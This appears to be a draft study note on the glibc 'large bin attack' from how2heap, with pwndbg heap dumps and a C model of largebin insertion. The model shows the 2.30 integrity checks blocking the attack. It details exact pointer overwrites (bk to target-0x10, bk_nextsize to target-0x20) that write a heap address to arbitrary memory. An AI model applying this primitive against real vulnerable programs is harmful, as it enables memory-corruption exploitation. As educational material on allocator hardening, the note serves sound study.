Draft, to be continued.

large bin attack

Two values on the stack:
stack_var1 (0x7fffffffdc90): 0
stack_var2 (0x7fffffffdc98): 0

malloc(0x420) p1
malloc(0x20)
malloc(0x500) p2
malloc(0x20)
malloc(0x500) p3
malloc(0x20)

free(p1)
free(p2)
unsortedbin
all: 0x603460 —▸ 0x603000 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x603460 /* '`4`' */

malloc(0x90)
This request empties the unsorted bin: p2 (0x510) is sorted into the 0x500 large bin, and the request is carved out of p1, whose remainder (0x6030a0) goes back to the unsorted bin.
unsortedbin
all: 0x6030a0 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x6030a0
largebins
0x500: 0x603460 —▸ 0x7ffff7dd1fa8 (main_arena+1160) ◂— 0x603460 /* '`4`' */

free(p3)
unsortedbin
all: 0x6039a0 —▸ 0x6030a0 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x6039a0
largebins
0x500: 0x603460 —▸ 0x7ffff7dd1fa8 (main_arena+1160) ◂— 0x603460 /* '`4`' */

pwndbg> x/40gx 0x603460
0x603460: 0x0000000000000000 0x0000000000000511
0x603470: 0x00007ffff7dd1fa8 0x00007ffff7dd1fa8
0x603480: 0x0000000000603460 0x0000000000603460
0x603490: 0x0000000000000000 0x0000000000000000

Free chunk (largebins) | PREV_INUSE
Addr: 0x603460
Size: 0x511
fd: 0x7ffff7dd1fa8
bk: 0x7ffff7dd1fa8
fd_nextsize: 0x603460
bk_nextsize: 0x603460

vulnerability
The overwrite of p2 (the chunk at 0x603460, already linked into the large bin) sets:
p2.size: 0x511 -> 0x3f1
p2.fd -> 0
p2.bk -> stack_var1 - 0x10 (0x7fffffffdc80)
p2.fd_nextsize -> 0
p2.bk_nextsize -> stack_var2 - 0x20 (0x7fffffffdc78)

pwndbg> x/20gx 0x603460
0x603460: 0x0000000000000000 0x00000000000003f1
0x603470: 0x0000000000000000 0x00007fffffffdc80
0x603480: 0x0000000000000000 0x00007fffffffdc78
0x603490: 0x0000000000000000 0x0000000000000000

malloc(0x90)
This request sorts p3 (0x6039a0, size 0x511) out of the unsorted bin into the 0x500 large bin. Because p2's size field now reads 0x3f1, p3 counts as the largest chunk and is linked in front of p2; while doing so glibc executes victim->bk_nextsize->fd_nextsize = victim and bck->fd = victim, with both pointers read from the corrupted p2, so the chunk address of p3 is written to stack_var1 and stack_var2.

stack_var1 (0x7fffffffdc90): 0x6039a0
stack_var2 (0x7fffffffdc98): 0x6039a0
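As an added example (not part of this note and not how2heap's code), the following C program models the largebin insertion step that the final allocation goes through, with `hardened` switching on the two integrity checks glibc 2.30 added to that step ("malloc(): largebin double linked list corrupted"). The chunk layout, field names and the order of the pointer writes follow glibc's malloc_chunk and _int_malloc; the bin header, the two chunks and the two fake chunks standing in for the stack slots are all constructed inside the program, and largebin_insert assumes the path taken here, where the chunk being sorted is larger than everything already in the bin.

```c
/* Added example, not from the original note or from how2heap: a model of the
 * largebin insertion step in glibc's _int_malloc, with the two checks glibc
 * 2.30 added. Only the path taken in the note is modelled: the chunk being
 * sorted is larger than every chunk in the bin, so it becomes the new head. */
#include <stddef.h>
#include <stdio.h>

/* Field layout of glibc's malloc_chunk (fd/bk at +0x10/+0x18,
 * fd_nextsize/bk_nextsize at +0x20/+0x28). */
typedef struct malloc_chunk {
    size_t prev_size;
    size_t size;
    struct malloc_chunk *fd;
    struct malloc_chunk *bk;
    struct malloc_chunk *fd_nextsize;
    struct malloc_chunk *bk_nextsize;
} mchunk;

enum insert_result {
    INSERT_OK = 0,
    INSERT_CORRUPT_NEXTSIZE = 1, /* 2.30 check on fwd->bk_nextsize fired */
    INSERT_CORRUPT_BK = 2        /* 2.30 check on fwd->bk fired */
};

/* Link `victim` in front of `fwd`, the current largest chunk of the bin
 * whose header is `bin`. With hardened == 0 this is the 2.23-era logic the
 * note runs on; with hardened == 1 the two 2.30 checks are applied in the
 * same places glibc applies them. */
static enum insert_result largebin_insert(mchunk *bin, mchunk *victim, int hardened)
{
    mchunk *fwd = bin->fd;
    mchunk *bck;

    victim->fd_nextsize = fwd;
    victim->bk_nextsize = fwd->bk_nextsize;
    if (hardened && fwd->bk_nextsize->fd_nextsize != fwd)
        return INSERT_CORRUPT_NEXTSIZE;
    fwd->bk_nextsize = victim;
    victim->bk_nextsize->fd_nextsize = victim; /* write through p2.bk_nextsize */

    bck = fwd->bk;
    if (hardened && bck->fd != fwd)
        return INSERT_CORRUPT_BK;
    victim->bk = bck;
    victim->fd = fwd;
    fwd->bk = victim;
    bck->fd = victim;                          /* write through p2.bk */
    return INSERT_OK;
}

struct outcome {
    enum insert_result res;
    int target1_hit; /* slot standing in for stack_var1 now holds &p3 */
    int target2_hit; /* slot standing in for stack_var2 now holds &p3 */
};

/* Constructed scenario mirroring the note: the bin holds only p2, whose
 * size, bk and bk_nextsize may have been overwritten, and p3 is sorted in. */
static struct outcome simulate(int hardened, int corrupt_bk, int corrupt_nextsize)
{
    mchunk bin = {0}, p2 = {0}, p3 = {0}, fake1 = {0}, fake2 = {0};
    struct outcome o = {INSERT_OK, 0, 0};

    /* healthy bin with one chunk: both circular lists pass through p2 */
    bin.fd = bin.bk = &p2;
    p2.fd = p2.bk = &bin;
    p2.fd_nextsize = p2.bk_nextsize = &p2;
    p2.size = 0x3f1; /* shrunk so that p3 counts as larger */
    p3.size = 0x511;

    /* The overwrite: p2.bk -> stack_var1 - 0x10 makes bck->fd land on
     * stack_var1; p2.bk_nextsize -> stack_var2 - 0x20 makes
     * victim->bk_nextsize->fd_nextsize land on stack_var2. fake1.fd and
     * fake2.fd_nextsize stand in for those two stack slots here. */
    if (corrupt_bk)
        p2.bk = &fake1;
    if (corrupt_nextsize)
        p2.bk_nextsize = &fake2;

    o.res = largebin_insert(&bin, &p3, hardened);
    o.target1_hit = (fake1.fd == &p3);
    o.target2_hit = (fake2.fd_nextsize == &p3);
    return o;
}

int main(void)
{
    static const char *names[] = {"ok", "corrupted (nextsize)", "corrupted (bk)"};
    struct outcome old = simulate(0, 1, 1);
    struct outcome cur = simulate(1, 1, 1);
    printf("2.23 logic: %s, stack_var1 hit=%d, stack_var2 hit=%d\n",
           names[old.res], old.target1_hit, old.target2_hit);
    printf("2.30 logic: %s, stack_var1 hit=%d, stack_var2 hit=%d\n",
           names[cur.res], cur.target1_hit, cur.target2_hit);
    return 0;
}
```

With the checks off, both stand-in slots end up holding the address of p3, which is exactly what the stack_var1/stack_var2 values above show. With the checks on, the nextsize check fires before either write happens, because the fake bk_nextsize target does not point back at p2; if only bk is corrupted, the bk check catches it instead. This is why the note's sequence only works against the older allocator.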